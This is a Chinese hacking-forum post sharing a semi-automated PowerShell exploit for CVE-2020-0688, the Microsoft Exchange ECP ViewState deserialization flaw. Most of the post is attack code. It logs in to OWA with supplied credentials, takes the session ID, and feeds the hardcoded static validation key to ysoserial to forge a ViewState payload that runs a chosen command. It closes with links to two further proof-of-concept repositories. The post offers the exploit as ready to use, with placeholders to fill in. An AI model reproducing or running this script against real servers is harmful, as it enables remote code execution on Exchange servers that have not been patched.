查看: 22717|回复: 0

CVE-2020-0688 powershell 半自动版

[复制链接]
  • TA的每日心情

    2020-10-2 23:00
  • 签到天数: 10 天

    [LV.3]偶尔看看II

    发表于 2020-2-27 10:43:16 | 显示全部楼层 |阅读模式
    内容来自于一个朋友

    需要修改的部分:
    [AppleScript] 纯文本查看 复制代码
    $target='https://192.168.137.2'
    $username='jerry'
    $pass='Admin12345'
    $command='calc.exe'


    ysoserial.exe 放当前目录

    [AppleScript] 纯文本查看 复制代码
    $target='https://192.168.137.2'
    $username='jerry'
    $pass='Admin12345'
    $command='calc.exe'


    [AppleScript] 纯文本查看 复制代码
    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
    $destination=[uri]::EscapeDataString($target)
    $response= Invoke-WebRequest -Uri "$target/owa/auth.owa" -Method "POST" -Headers @{"User-Agent"="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36"; "Sec-Fetch-Dest"="document"; "Accept"="text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"; "Sec-Fetch-Site"="same-origin"; "Sec-Fetch-Mode"="navigate"; "Accept-Encoding"="gzip, deflate, br"; "Accept-Language"="zh-CN,zh;q=0.9,en;q=0.8";} -ContentType "application/x-www-form-urlencoded" -Body "destination=$destination%2Fecp%2Fdefault.aspx&flags=4&forcedownlevel=0&username=$username&password=$pass&passwordText=&isUtf8=1"
    $Headers= $response.Headers
    $cookie=$Headers['Set-cookie'] -match 'ASP.NET_SessionId=([\w\d-]+)'
    $ASP_NET_SessionId=$Matches[1]
    $VIEWSTATEGENERATOR='B97B4E27'
    $validationkey = 'CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF'



    [AppleScript] 纯文本查看 复制代码
    write-host "Exec: .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c `"$command`" --validationalg=`"SHA1`" --validationkey=`"$validationkey`" --generator=`"$VIEWSTATEGENERATOR`" --viewstateuserkey=`"$ASP_NET_SessionId`" --isdebug -–islegacy"
    $yso= .\ysoserial.exe -p ViewState -g TextFormattingRunProperties -c `"$command`" --validationalg=`"SHA1`" --validationkey=`"$validationkey`" --generator=`"$VIEWSTATEGENERATOR`" --viewstateuserkey=`"$ASP_NET_SessionId`" --isdebug –-islegacy
    $generator=$yso -match "^(?:[A-Za-z0-9+/]{4})*(?:[A-Za-z0-9+/]{2}==|[A-Za-z0-9+/]{3}=)?$"
    $ViewState=$response.Forms[0].Fields.__VIEWSTATE
    write-host "$target/ecp/default.aspx?__VIEWSTATEGENERATOR=$generator&__VIEWSTATE=$ViewState"


    412dasd.png

    另外附加2个poc:
    [AppleScript] 纯文本查看 复制代码
    https://github.com/Jumbo-WJB/CVE-2020-0688
    [url]https://github.com/random-robbie/cve-2020-0688[/url]
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-21 20:16 , Processed in 0.021173 second(s), 13 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部